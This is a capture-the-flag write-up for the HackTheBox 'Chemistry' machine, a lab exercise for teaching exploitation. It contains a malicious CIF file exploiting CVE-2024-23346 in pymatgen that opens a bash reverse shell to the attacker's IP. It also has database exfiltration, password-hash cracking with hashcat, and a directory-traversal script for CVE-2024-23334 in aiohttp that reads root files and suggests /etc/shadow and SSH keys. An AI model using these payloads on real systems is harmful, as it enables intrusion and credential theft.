HackTheBox Chemistry Writeup
Explore the fundamentals of cybersecurity in the Chemistry Capture The Flag (CTF) challenge, a easy-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.
Add Hosts
10.10.11.38 chemistry.htb
Script to add hosts automatically
ip="10.10.11.38"
domain="chemistry.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts
Mapping
nmap -sCV chemistry.htb
Nmap scan report for chemistry.htb (10.10.11.38)
Host is up (0.052s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b6:fc:20:ae:9d:1d:45:1d:0b:ce:d9:d0:20:f2:6f:dc (RSA)
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open http Werkzeug httpd 3.0.3 (Python 3.9.5)
|_http-title: Chemistry - Home
|_http-server-header: Werkzeug/3.0.3 Python/3.9.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
CVE-2024-23346
https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f
listener
nc -lvnp 9001
make the file example.cif
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("/bin/bash -c \'sh -i >& /dev/tcp/10.10.14.16/9001 0>&1\'");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
Upload the file to http://chemistry.htb:5000/.
when the listener connect in the pwned machine.
python3 -m http.server
in your local machine
wget http://chemistry.htb:8000/instance/database.db
sqlite3 database.db
SELECT * FROM user;
Brute Force the Hash
Use a hash cracking tool like hashcat or John the Ripper to perform a brute force attack on the password hash, or use a service such as crackstation for this purpose.
echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat -m 0 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat -m 0 /tmp/hash.txt --show
rm -rf /tmp/hash.txt
Forwad port 8080 and log with ssh
ssh -L 8081:localhost:8080 rosa@chemistry.htb
cat /home/rosa/user.txt
CVE-2024-23334
dirb http://localhost:8080/
Scan the remote service directly. You may find:
<http://localhost:8080/assets> (CODE:403|SIZE:14)
The server is running Python/3.9 aiohttp/3.9.1, which is vulnerable to CVE-2024-23334, allowing potential exploitation of assets.
On the remote machine, use the following script to exploit directory traversal without needing to set up a tunnel:
url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/root.txt"
for ((i=0; i<15; i++)); do
payload+="$string"
echo "[+] Testing with $payload$file"
status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
echo -e "\tStatus code --> $status_code"
if [[ $status_code -eq 200 ]]; then
curl -s --path-as-is "$url$payload$file"
break
fi
done
If you want to retrieve sensitive files, simply modify the file variable in the script to target files like root/.ssh/id_rsa or /etc/shadow and rerun the script: